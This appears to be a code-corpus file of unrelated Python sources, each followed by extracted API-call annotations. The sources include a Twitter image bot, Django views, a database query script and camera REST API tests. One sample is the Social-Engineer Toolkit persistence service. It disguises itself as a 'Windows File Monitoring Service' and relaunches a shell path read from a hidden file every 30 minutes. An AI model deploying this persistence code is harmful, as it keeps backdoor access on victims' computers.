if isinstance(typ.type_json, str):
key = typ.type_json
else:
key = str(typ.type_json.get('.class', "VAR"))
key = "".join(i if i in allowed_key_chars else '_' for i in key)
type_to_exprs[key].append(node)
# print("Adding", key, astlib.to_code(node))
ctr_map: Dict[str, Dict[str, int]] = {k: {} for k in type_to_exprs.keys()}
repl_map: NodeReplMap = {}
names_map: Dict[str, List[str]] = collections.defaultdict(list)
for typ_key, exprs in type_to_exprs.items():
ctr_map_entry = ctr_map[typ_key]
for expr in exprs:
node_key = astlib.to_code(expr)
if node_key not in ctr_map_entry:
ctr_map_entry[node_key] = idx = len(ctr_map_entry) + 1
names_map[typ_key].append(f"{typ_key.upper()}{idx}")
idx = ctr_map_entry[node_key]
repl_map[expr] = astlib.create_name_expr(f"{typ_key.upper()}{idx}")
return astlib.with_deep_replacements(target, repl_map), names_map
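# For illustration (hypothetical expression): after the earlier normalization passes, an expression
# like df[df["Price"] > 100] templatizes to roughly DF1[DF1["STR1"] > INT1], with names_map recording
# {"df": ["DF1"], "str": ["STR1"], "int": ["INT1"]}.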
def get_mypy_cache_dir_path(uid: int) -> str:
"""Returns a cache dir to use for mypy based on a UID. Useful for multiprocess safety."""
script_dir = os.path.abspath(os.path.dirname(__file__))
return os.path.join(script_dir, f".mypy_cache{uid}")
def get_created_mypy_cache_dir_paths() -> List[str]:
"""Returns all the created mypy cache dirs"""
script_dir = os.path.abspath(os.path.dirname(__file__))
return glob.glob(os.path.join(script_dir, ".mypy_cache*"))
| [
"databutler.pat.astlib.with_deep_replacements",
"io.StringIO",
"os.path.dirname",
"databutler.pat.astlib.walk",
"collections.defaultdict",
"databutler.pat.astlib.iter_body_stmts",
"databutler.pat.astlib.is_constant",
"databutler.pat.astlib.get_constant_value",
"databutler.pat.astlib.parse_expr",
"attrs.field",
"attrs.define",
"os.path.join",
"databutler.pat.astlib.to_code",
"databutler.pat.astlib.get_definitions_and_accesses"
] | [((887, 921), 'attrs.define', 'attrs.define', ([], {'eq': '(False)', 'repr': '(False)'}), '(eq=False, repr=False)\n', (899, 921), False, 'import attrs\n'), ((1248, 1273), 'attrs.field', 'attrs.field', ([], {'factory': 'dict'}), '(factory=dict)\n', (1259, 1273), False, 'import attrs\n'), ((2735, 2780), 'databutler.pat.astlib.get_definitions_and_accesses', 'astlib.get_definitions_and_accesses', (['code_ast'], {}), '(code_ast)\n', (2770, 2780), False, 'from databutler.pat import astlib\n'), ((4172, 4217), 'databutler.pat.astlib.get_definitions_and_accesses', 'astlib.get_definitions_and_accesses', (['code_ast'], {}), '(code_ast)\n', (4207, 4217), False, 'from databutler.pat import astlib\n'), ((6083, 6147), 'databutler.pat.astlib.with_deep_replacements', 'astlib.with_deep_replacements', (['target', 'repl_dict', 'output_mapping'], {}), '(target, repl_dict, output_mapping)\n', (6112, 6147), False, 'from databutler.pat import astlib\n'), ((8908, 8997), 'databutler.pat.astlib.with_deep_replacements', 'astlib.with_deep_replacements', (['target', '{**df_repl_map, **series_repl_map}', 'output_map'], {}), '(target, {**df_repl_map, **series_repl_map},\n output_map)\n', (8937, 8997), False, 'from databutler.pat import astlib\n'), ((9413, 9432), 'databutler.pat.astlib.walk', 'astlib.walk', (['target'], {}), '(target)\n', (9424, 9432), False, 'from databutler.pat import astlib\n'), ((12833, 12862), 'collections.defaultdict', 'collections.defaultdict', (['list'], {}), '(list)\n', (12856, 12862), False, 'import collections\n'), ((14698, 14727), 'collections.defaultdict', 'collections.defaultdict', (['list'], {}), '(list)\n', (14721, 14727), False, 'import collections\n'), ((15482, 15527), 'os.path.join', 'os.path.join', (['script_dir', 'f""".mypy_cache{uid}"""'], {}), "(script_dir, f'.mypy_cache{uid}')\n", (15494, 15527), False, 'import os\n'), ((4369, 4401), 'databutler.pat.astlib.iter_body_stmts', 'astlib.iter_body_stmts', (['code_ast'], {}), '(code_ast)\n', (4391, 4401), False, 'from databutler.pat import astlib\n'), ((4585, 4617), 'databutler.pat.astlib.iter_body_stmts', 'astlib.iter_body_stmts', (['code_ast'], {}), '(code_ast)\n', (4607, 4617), False, 'from databutler.pat import astlib\n'), ((4640, 4657), 'databutler.pat.astlib.walk', 'astlib.walk', (['stmt'], {}), '(stmt)\n', (4651, 4657), False, 'from databutler.pat import astlib\n'), ((5192, 5236), 'databutler.pat.astlib.is_constant', 'astlib.is_constant', (['cur.enclosing_node.value'], {}), '(cur.enclosing_node.value)\n', (5210, 5236), False, 'from databutler.pat import astlib\n'), ((10431, 10494), 'databutler.pat.astlib.with_deep_replacements', 'astlib.with_deep_replacements', (['target', 'repl_map', 'output_mapping'], {}), '(target, repl_map, output_mapping)\n', (10460, 10494), False, 'from databutler.pat import astlib\n'), ((12242, 12305), 'databutler.pat.astlib.with_deep_replacements', 'astlib.with_deep_replacements', (['target', 'repl_map', 'output_mapping'], {}), '(target, repl_map, output_mapping)\n', (12271, 12305), False, 'from databutler.pat import astlib\n'), ((12982, 13006), 'databutler.pat.astlib.is_constant', 'astlib.is_constant', (['node'], {}), '(node)\n', (13000, 13006), False, 'from databutler.pat import astlib\n'), ((15210, 15257), 'databutler.pat.astlib.with_deep_replacements', 'astlib.with_deep_replacements', (['target', 'repl_map'], {}), '(target, repl_map)\n', (15239, 15257), False, 'from databutler.pat import astlib\n'), ((15444, 15469), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (15459, 
15469), False, 'import os\n'), ((15666, 15691), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (15681, 15691), False, 'import os\n'), ((15714, 15754), 'os.path.join', 'os.path.join', (['script_dir', '""".mypy_cache*"""'], {}), "(script_dir, '.mypy_cache*')\n", (15726, 15754), False, 'import os\n'), ((5256, 5307), 'databutler.pat.astlib.get_constant_value', 'astlib.get_constant_value', (['cur.enclosing_node.value'], {}), '(cur.enclosing_node.value)\n', (5281, 5307), False, 'from databutler.pat import astlib\n'), ((13053, 13084), 'databutler.pat.astlib.get_constant_value', 'astlib.get_constant_value', (['node'], {}), '(node)\n', (13078, 13084), False, 'from databutler.pat import astlib\n'), ((14868, 14888), 'databutler.pat.astlib.to_code', 'astlib.to_code', (['expr'], {}), '(expr)\n', (14882, 14888), False, 'from databutler.pat import astlib\n'), ((1488, 1501), 'io.StringIO', 'io.StringIO', ([], {}), '()\n', (1499, 1501), False, 'import io\n'), ((6024, 6043), 'databutler.pat.astlib.walk', 'astlib.walk', (['target'], {}), '(target)\n', (6035, 6043), False, 'from databutler.pat import astlib\n'), ((3355, 3381), 'databutler.pat.astlib.to_code', 'astlib.to_code', (['alias.name'], {}), '(alias.name)\n', (3369, 3381), False, 'from databutler.pat import astlib\n'), ((12036, 12084), 'databutler.pat.astlib.parse_expr', 'astlib.parse_expr', (['f"""dummy["{expr.attr.value}"]"""'], {}), '(f\'dummy["{expr.attr.value}"]\')\n', (12053, 12084), False, 'from databutler.pat import astlib\n'), ((3174, 3216), 'databutler.pat.astlib.to_code', 'astlib.to_code', (['def_.enclosing_node.module'], {}), '(def_.enclosing_node.module)\n', (3188, 3216), False, 'from databutler.pat import astlib\n'), ((3545, 3578), 'databutler.pat.astlib.to_code', 'astlib.to_code', (['alias.asname.name'], {}), '(alias.asname.name)\n', (3559, 3578), False, 'from databutler.pat import astlib\n')] |
## @package bot
# Module that sets up the Geometrize Twitter bot.
#
# Invoke this script to run the bot i.e. "python bot.py".
import sys
import config
import dependency_locator
import geometrize
import geometrize_bot
import launch_text
import on_status_event
import tweepy
# Print welcome text.
launch_text.print_launch_text()
# Check that secrets/app credentials have been filled out.
if not config.validate_credentials():
print("Failed to validate app credentials, will exit. Did you remember to enter them in config.py?")
sys.exit(1)
# Check that the Geometrize executable is where we expect it to be.
if not dependency_locator.geometrize_executable_exists():
print("Failed to locate the Geometrize executable, will exit. Did you copy it to the 'geometrize' subdirectory? Expected it to be here: " + dependency_locator.get_geometrize_executable_path())
sys.exit(2)
# Run a quick test script to confirm Geometrize is in working order.
print("Running startup tests to ensure Geometrize is working...\r\n")
if geometrize.test_geometrize():
print("Geometrize startup tests succeeded!\r\n")
else:
print("Geometrize startup tests failed. Please report an issue here: https://github.com/Tw1ddle/geometrize-twitter-bot \r\n")
sys.exit(3)
# Connect to Twitter.
tweepy_auth = tweepy.OAuthHandler(config.OAUTH_CONSUMER_KEY, config.OAUTH_CONSUMER_SECRET)
tweepy_auth.set_access_token(config.OAUTH_ACCESS_TOKEN, config.OAUTH_ACCESS_SECRET)
tweepy_api = tweepy.API(tweepy_auth)
## Callback triggered when the stream listener connects.
def on_connect(api):
print("Twitter stream listener did connect")
## Callback triggered when the stream listener times out.
def on_timeout(api):
print("Twitter stream listener did time out")
return False
## Callback triggered when the listener encounters an error.
def on_error(api, code):
print("Encountered Twitter error response: %s" % code)
return True
## Callback triggered when the stream listener for the Geometrize bot account reports a status event.
def on_on_demand_status_event(api, status):
print("Received Twitter stream listener status event")
on_status_event.on_on_demand_status_event(api, status)
## Callback triggered when the stream listener for tracking specific Twitter accounts reports a status event.
def on_account_watcher_status_event(api, status):
print("Received Twitter stream listener status event")
on_status_event.on_account_watcher_status_event(api, status)
## Callback triggered when setting up the stream filter for tracking the Geometrize bot account.
def on_on_demand_filter_setup(stream):
print("Setting up on demand tweet filter...")
stream.filter(track = [config.TWITTER_BOT_USERNAME], is_async = True)
## Callback triggered when setting up the stream filter for tracking specific Twitter accounts.
def on_account_watcher_filter_setup(stream):
print("Setting up account watcher tweet filter...")
stream.filter(follow = config.TWITTER_BOT_WATCH_ACCOUNTS, is_async = True)
# Create and set up the on-demand Geometrize bot.
# This bot waits for users to tweet images at the bot, which it then geometrizes.
on_demand_bot = geometrize_bot.GeometrizeBot(
tweepy_auth,
tweepy_api,
on_connect,
on_timeout,
on_error,
on_on_demand_status_event,
on_on_demand_filter_setup)
# Create and set up the specific account watcher bot.
# This bot watches specific accounts and geometrizes images they tweet.
account_watcher_bot = geometrize_bot.GeometrizeBot(
tweepy_auth,
tweepy_api,
on_connect,
on_timeout,
on_error,
on_account_watcher_status_event,
on_account_watcher_filter_setup)
| [
"geometrize.test_geometrize",
"tweepy.API",
"config.validate_credentials",
"on_status_event.on_on_demand_status_event",
"dependency_locator.get_geometrize_executable_path",
"launch_text.print_launch_text",
"sys.exit",
"on_status_event.on_account_watcher_status_event",
"dependency_locator.geometrize_executable_exists",
"tweepy.OAuthHandler",
"geometrize_bot.GeometrizeBot"
] | [((300, 331), 'launch_text.print_launch_text', 'launch_text.print_launch_text', ([], {}), '()\n', (329, 331), False, 'import launch_text\n'), ((1034, 1062), 'geometrize.test_geometrize', 'geometrize.test_geometrize', ([], {}), '()\n', (1060, 1062), False, 'import geometrize\n'), ((1306, 1382), 'tweepy.OAuthHandler', 'tweepy.OAuthHandler', (['config.OAUTH_CONSUMER_KEY', 'config.OAUTH_CONSUMER_SECRET'], {}), '(config.OAUTH_CONSUMER_KEY, config.OAUTH_CONSUMER_SECRET)\n', (1325, 1382), False, 'import tweepy\n'), ((1480, 1503), 'tweepy.API', 'tweepy.API', (['tweepy_auth'], {}), '(tweepy_auth)\n', (1490, 1503), False, 'import tweepy\n'), ((3178, 3323), 'geometrize_bot.GeometrizeBot', 'geometrize_bot.GeometrizeBot', (['tweepy_auth', 'tweepy_api', 'on_connect', 'on_timeout', 'on_error', 'on_on_demand_status_event', 'on_on_demand_filter_setup'], {}), '(tweepy_auth, tweepy_api, on_connect,\n on_timeout, on_error, on_on_demand_status_event, on_on_demand_filter_setup)\n', (3206, 3323), False, 'import geometrize_bot\n'), ((3498, 3659), 'geometrize_bot.GeometrizeBot', 'geometrize_bot.GeometrizeBot', (['tweepy_auth', 'tweepy_api', 'on_connect', 'on_timeout', 'on_error', 'on_account_watcher_status_event', 'on_account_watcher_filter_setup'], {}), '(tweepy_auth, tweepy_api, on_connect,\n on_timeout, on_error, on_account_watcher_status_event,\n on_account_watcher_filter_setup)\n', (3526, 3659), False, 'import geometrize_bot\n'), ((399, 428), 'config.validate_credentials', 'config.validate_credentials', ([], {}), '()\n', (426, 428), False, 'import config\n'), ((539, 550), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (547, 550), False, 'import sys\n'), ((627, 676), 'dependency_locator.geometrize_executable_exists', 'dependency_locator.geometrize_executable_exists', ([], {}), '()\n', (674, 676), False, 'import dependency_locator\n'), ((879, 890), 'sys.exit', 'sys.exit', (['(2)'], {}), '(2)\n', (887, 890), False, 'import sys\n'), ((1257, 1268), 'sys.exit', 'sys.exit', (['(3)'], {}), '(3)\n', (1265, 1268), False, 'import sys\n'), ((2151, 2205), 'on_status_event.on_on_demand_status_event', 'on_status_event.on_on_demand_status_event', (['api', 'status'], {}), '(api, status)\n', (2192, 2205), False, 'import on_status_event\n'), ((2430, 2490), 'on_status_event.on_account_watcher_status_event', 'on_status_event.on_account_watcher_status_event', (['api', 'status'], {}), '(api, status)\n', (2477, 2490), False, 'import on_status_event\n'), ((822, 873), 'dependency_locator.get_geometrize_executable_path', 'dependency_locator.get_geometrize_executable_path', ([], {}), '()\n', (871, 873), False, 'import dependency_locator\n')] |
from django.views.generic.base import View
from django.template.response import HttpResponse
from share.oaipmh.repository import OAIRepository
class OAIPMHView(View):
CONTENT_TYPE = 'text/xml'
def get(self, request):
return self.oai_response(**request.GET)
def post(self, request):
return self.oai_response(**request.POST)
def oai_response(self, **kwargs):
repository = OAIRepository()
xml = repository.handle_request(self.request, kwargs)
return HttpResponse(xml, content_type=self.CONTENT_TYPE)
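# Hypothetical wiring (not part of this module; the URL pattern and module path are assumptions):
# a minimal urls.py entry for the view above could look like
#   from django.urls import path
#   urlpatterns = [path('oai-pmh/', OAIPMHView.as_view(), name='oaipmh')]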
| [
"share.oaipmh.repository.OAIRepository",
"django.template.response.HttpResponse"
] | [((416, 431), 'share.oaipmh.repository.OAIRepository', 'OAIRepository', ([], {}), '()\n', (429, 431), False, 'from share.oaipmh.repository import OAIRepository\n'), ((509, 558), 'django.template.response.HttpResponse', 'HttpResponse', (['xml'], {'content_type': 'self.CONTENT_TYPE'}), '(xml, content_type=self.CONTENT_TYPE)\n', (521, 558), False, 'from django.template.response import HttpResponse\n')] |
import pandas as pd
import psycopg2
#from sqlalchemy import create_engine
psql_credeintal = {
'database': 'wode',
'user': 'wode',
'password': '***',
'host': '192.168.3.11',
'port': '5432'
}
con = psycopg2.connect(**psql_credeintal)
def get_winrate(user_id):
query = "SELECT position, winrate FROM positions WHERE user_id='%s' order by position" % user_id
query_results = pd.read_sql_query(query,con)
return query_results
get_winrate(119807644)
| [
"pandas.read_sql_query",
"psycopg2.connect"
] | [((241, 276), 'psycopg2.connect', 'psycopg2.connect', ([], {}), '(**psql_credeintal)\n', (257, 276), False, 'import psycopg2\n'), ((425, 454), 'pandas.read_sql_query', 'pd.read_sql_query', (['query', 'con'], {}), '(query, con)\n', (442, 454), True, 'import pandas as pd\n')] |
from django.core.files.base import ContentFile
import base64
import uuid
def get_report_image(data):
_, image_binary = data.split(';base64')
decoded_image = base64.b64decode(image_binary)
img_name = str(uuid.uuid4())[:10] + '.png'
data = ContentFile(decoded_image, name=img_name)
return data
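# Example usage (illustrative; the `report` object and its `image` field are hypothetical):
# `data` is expected to be a data-URI string such as "data:image/png;base64,iVBORw0...", and the
# returned ContentFile can be assigned straight to a Django ImageField/FileField, e.g.
#   report.image = get_report_image(request.data['image'])
#   report.save()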
| [
"uuid.uuid4",
"base64.b64decode",
"django.core.files.base.ContentFile"
] | [((168, 198), 'base64.b64decode', 'base64.b64decode', (['image_binary'], {}), '(image_binary)\n', (184, 198), False, 'import base64\n'), ((257, 298), 'django.core.files.base.ContentFile', 'ContentFile', (['decoded_image'], {'name': 'img_name'}), '(decoded_image, name=img_name)\n', (268, 298), False, 'from django.core.files.base import ContentFile\n'), ((218, 230), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (228, 230), False, 'import uuid\n')] |
#!/usr/bin/python
#
##########################################################################
#
# Social-Engineer Toolkit Persistence Service
#
# Right now this is a pretty lame attempt at a service but will grow over time. The text file it reads in from isn't
# really a good idea, but it's a start.
#
##########################################################################
#
# ex usage: persistence.exe install, start, stop, remove
#
# You can see the output of this program by running python site-packages\win32\lib\win32traceutil for debugging
#
##########################################################################
import win32service
import win32serviceutil
import win32event
import win32evtlogutil
import win32traceutil
import servicemanager
import winerror
import time
import sys
import os
import subprocess
class aservice(win32serviceutil.ServiceFramework):
_svc_name_ = "windows_monitoring"
_svc_display_name_ = "Windows File Monitoring Service"
_svc_deps_ = ["EventLog"]
def __init__(self, args):
win32serviceutil.ServiceFramework.__init__(self, args)
self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)
self.isAlive = True
def SvcStop(self):
# tell Service Manager we are trying to stop (required)
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
# set the event to call
win32event.SetEvent(self.hWaitStop)
self.isAlive = False
def SvcDoRun(self):
import servicemanager
# wait for beeing stopped ...
self.timeout = 1000 # In milliseconds (update every second)
while self.isAlive:
# wait for service stop signal, if timeout, loop again
rc = win32event.WaitForSingleObject(self.hWaitStop, self.timeout)
# expand the filesystem path
windir = os.environ['WINDIR']
# grab homepath
homedir_path = os.getenv("SystemDrive")
homedir_path = homedir_path + "\\Program Files\\Common Files\\"
# pull the windows operating system version number
windows_version = sys.getwindowsversion()[2]
# pull integer of version number
windows_version = int(windows_version)
# windows XP and below
if windows_version < 3791:
fileopen = open("%s\\system32\\isjxwqjs" % (windir), "r")
# windows 7, vista, 2008, etc. that might have UAC so we write to
# AppData instead
if windows_version > 3791:
fileopen = open("%s\\isjxwqjs" % (homedir_path), "r")
for line in fileopen:
# pull set-path, this is pulled from interactive shell and
# written when persistence is called
set_path = line.rstrip()
# specify filename to execute the SET interactive shell
subprocess.Popen('%s' % (set_path), shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE)
# sleep 30 mins
time.sleep(1800)
self.ReportServiceStatus(win32service.SERVICE_STOPPED)
return
if __name__ == '__main__':
# If invoked with no arguments, run as a service; otherwise let pywin32 handle the command line (install/start/stop/remove)
if len(sys.argv) == 1:
try:
evtsrc_dll = os.path.abspath(servicemanager.__file__)
servicemanager.PrepareToHostSingle(aservice)
servicemanager.Initialize('aservice', evtsrc_dll)
servicemanager.StartServiceCtrlDispatcher()
except win32service.error as details:
if details[0] == winerror.ERROR_FAILED_SERVICE_CONTROLLER_CONNECT:
win32serviceutil.usage()
else:
win32serviceutil.HandleCommandLine(aservice)
| [
"win32serviceutil.HandleCommandLine",
"subprocess.Popen",
"os.path.abspath",
"sys.getwindowsversion",
"servicemanager.StartServiceCtrlDispatcher",
"win32event.SetEvent",
"time.sleep",
"win32event.WaitForSingleObject",
"servicemanager.PrepareToHostSingle",
"win32event.CreateEvent",
"servicemanager.Initialize",
"win32serviceutil.usage",
"win32serviceutil.ServiceFramework.__init__",
"os.getenv"
] | [((1068, 1122), 'win32serviceutil.ServiceFramework.__init__', 'win32serviceutil.ServiceFramework.__init__', (['self', 'args'], {}), '(self, args)\n', (1110, 1122), False, 'import win32serviceutil\n'), ((1148, 1188), 'win32event.CreateEvent', 'win32event.CreateEvent', (['None', '(0)', '(0)', 'None'], {}), '(None, 0, 0, None)\n', (1170, 1188), False, 'import win32event\n'), ((1413, 1448), 'win32event.SetEvent', 'win32event.SetEvent', (['self.hWaitStop'], {}), '(self.hWaitStop)\n', (1432, 1448), False, 'import win32event\n'), ((3740, 3784), 'win32serviceutil.HandleCommandLine', 'win32serviceutil.HandleCommandLine', (['aservice'], {}), '(aservice)\n', (3774, 3784), False, 'import win32serviceutil\n'), ((1752, 1812), 'win32event.WaitForSingleObject', 'win32event.WaitForSingleObject', (['self.hWaitStop', 'self.timeout'], {}), '(self.hWaitStop, self.timeout)\n', (1782, 1812), False, 'import win32event\n'), ((1951, 1975), 'os.getenv', 'os.getenv', (['"""SystemDrive"""'], {}), "('SystemDrive')\n", (1960, 1975), False, 'import os\n'), ((2916, 3036), 'subprocess.Popen', 'subprocess.Popen', (["('%s' % set_path)"], {'shell': '(True)', 'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'stdin': 'subprocess.PIPE'}), "('%s' % set_path, shell=True, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n", (2932, 3036), False, 'import subprocess\n'), ((3104, 3120), 'time.sleep', 'time.sleep', (['(1800)'], {}), '(1800)\n', (3114, 3120), False, 'import time\n'), ((3340, 3380), 'os.path.abspath', 'os.path.abspath', (['servicemanager.__file__'], {}), '(servicemanager.__file__)\n', (3355, 3380), False, 'import os\n'), ((3393, 3437), 'servicemanager.PrepareToHostSingle', 'servicemanager.PrepareToHostSingle', (['aservice'], {}), '(aservice)\n', (3427, 3437), False, 'import servicemanager\n'), ((3450, 3499), 'servicemanager.Initialize', 'servicemanager.Initialize', (['"""aservice"""', 'evtsrc_dll'], {}), "('aservice', evtsrc_dll)\n", (3475, 3499), False, 'import servicemanager\n'), ((3512, 3555), 'servicemanager.StartServiceCtrlDispatcher', 'servicemanager.StartServiceCtrlDispatcher', ([], {}), '()\n', (3553, 3555), False, 'import servicemanager\n'), ((2145, 2168), 'sys.getwindowsversion', 'sys.getwindowsversion', ([], {}), '()\n', (2166, 2168), False, 'import sys\n'), ((3697, 3721), 'win32serviceutil.usage', 'win32serviceutil.usage', ([], {}), '()\n', (3719, 3721), False, 'import win32serviceutil\n')] |
import requests
from model.json_check import *
from model.input_data import *
# Request the settings of all CAM objects
def test_GetV1AllCamerasCode200():
data = "success"
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/", auth=auth)
user_resp_code = "200"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["status"]
assert data == n
def test_GetV1AllCamerasStatus401():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/", auth=("", ""))
user_resp_code = "401"
assert str(response.status_code) == user_resp_code
# Request the settings of a single CAM object
def test_GetV1CamerasByIdCode200():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId, auth=auth)
user_resp_code = "200"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["data"]["id"]
assert camId == n
def test_GetV1CamerasByIdCode401():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId, auth=("", ""))
user_resp_code = "401"
assert str(response.status_code) == user_resp_code
def test_GetV1CamerasByIdCode404():
data = "Unknown CAM id:0"
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/0", auth=auth)
user_resp_code = "404"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["message"]
assert data == n
# Request the status field of a CAM object
def test_GetV1CameraStatusCode200():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/status", auth=auth)
user_resp_code = "200"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["data"]["id"]
assert camId == n
def test_GetV1CameraStatusCode401():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/status", auth=("", ""))
user_resp_code = "401"
assert str(response.status_code) == user_resp_code
def test_GetV1CameraStatusCode404():
data = "Unknown CAM id:0"
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/0/status", auth=auth)
user_resp_code = "404"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["message"]
assert data == n
# Request the rtsp field of a CAM object
def test_GetV1CameraRtspCode200():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/rtsp", auth=auth)
user_resp_code = "200"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["data"]["id"]
assert camId == n
def test_GetV1CameraRtspCode401():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/rtsp", auth=("", ""))
user_resp_code = "401"
assert str(response.status_code) == user_resp_code
def test_GetV1CameraRtspCode404():
data = "Unknown CAM id:0"
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/0/rtsp", auth=auth)
user_resp_code = "404"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["message"]
assert data == n
# Request the rtsp/live field of a CAM object
def test_GetV1CameraRtspLiveCode200():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/rtsp/live", auth=auth)
user_resp_code = "200"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["data"]["id"]
assert camId == n
def test_GetV1CameraRtspLiveCode401():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/rtsp/live", auth=("", ""))
user_resp_code = "401"
assert str(response.status_code) == user_resp_code
def test_GetV1CameraRtspLiveCode404():
data = "Unknown CAM id:0"
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/0/rtsp/live", auth=auth)
user_resp_code = "404"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["message"]
assert data == n
# Request the rtsp/archive field of a CAM object
def test_GetV1CameraRtspArchiveCode200():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/rtsp/archive", auth=auth)
user_resp_code = "200"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["data"]["id"]
assert camId == n
def test_GetV1CameraRtspArchiveCode401():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/rtsp/archive", auth=("", ""))
user_resp_code = "401"
assert str(response.status_code) == user_resp_code
def test_GetV1CameraRtspArchiveCode404():
data = "Unknown CAM id:0"
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/0/rtsp/archive", auth=auth)
user_resp_code = "404"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["message"]
assert data == n
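# The CAM endpoint tests above follow one pattern per route: 200 with valid credentials, 401 with empty credentials, 404 for the unknown camera id 0; they are normally collected and run with pytest.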
| [
"requests.get"
] | [((200, 291), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/')", 'auth': 'auth'}), "(url='http://' + slave_ip + ':' + restPort + '/api/v1/cameras/',\n auth=auth)\n", (212, 291), False, 'import requests\n'), ((528, 623), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/')", 'auth': "('', '')"}), "(url='http://' + slave_ip + ':' + restPort + '/api/v1/cameras/',\n auth=('', ''))\n", (540, 623), False, 'import requests\n'), ((790, 889), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' + camId)", 'auth': 'auth'}), "(url='http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' +\n camId, auth=auth)\n", (802, 889), False, 'import requests\n'), ((1128, 1231), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' + camId)", 'auth': "('', '')"}), "(url='http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' +\n camId, auth=('', ''))\n", (1140, 1231), False, 'import requests\n'), ((1383, 1475), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/0')", 'auth': 'auth'}), "(url='http://' + slave_ip + ':' + restPort +\n '/api/v1/cameras/0', auth=auth)\n", (1395, 1475), False, 'import requests\n'), ((1758, 1869), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' + camId + '/status'\n )", 'auth': 'auth'}), "(url='http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' +\n camId + '/status', auth=auth)\n", (1770, 1869), False, 'import requests\n'), ((2107, 2222), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' + camId + '/status'\n )", 'auth': "('', '')"}), "(url='http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' +\n camId + '/status', auth=('', ''))\n", (2119, 2222), False, 'import requests\n'), ((2374, 2473), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/0/status')", 'auth': 'auth'}), "(url='http://' + slave_ip + ':' + restPort +\n '/api/v1/cameras/0/status', auth=auth)\n", (2386, 2473), False, 'import requests\n'), ((2753, 2862), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' + camId + '/rtsp')", 'auth': 'auth'}), "(url='http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' +\n camId + '/rtsp', auth=auth)\n", (2765, 2862), False, 'import requests\n'), ((3098, 3211), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' + camId + '/rtsp')", 'auth': "('', '')"}), "(url='http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' +\n camId + '/rtsp', auth=('', ''))\n", (3110, 3211), False, 'import requests\n'), ((3360, 3457), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/0/rtsp')", 'auth': 'auth'}), "(url='http://' + slave_ip + ':' + restPort +\n '/api/v1/cameras/0/rtsp', auth=auth)\n", (3372, 3457), False, 'import requests\n'), ((3746, 3860), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' + camId +\n 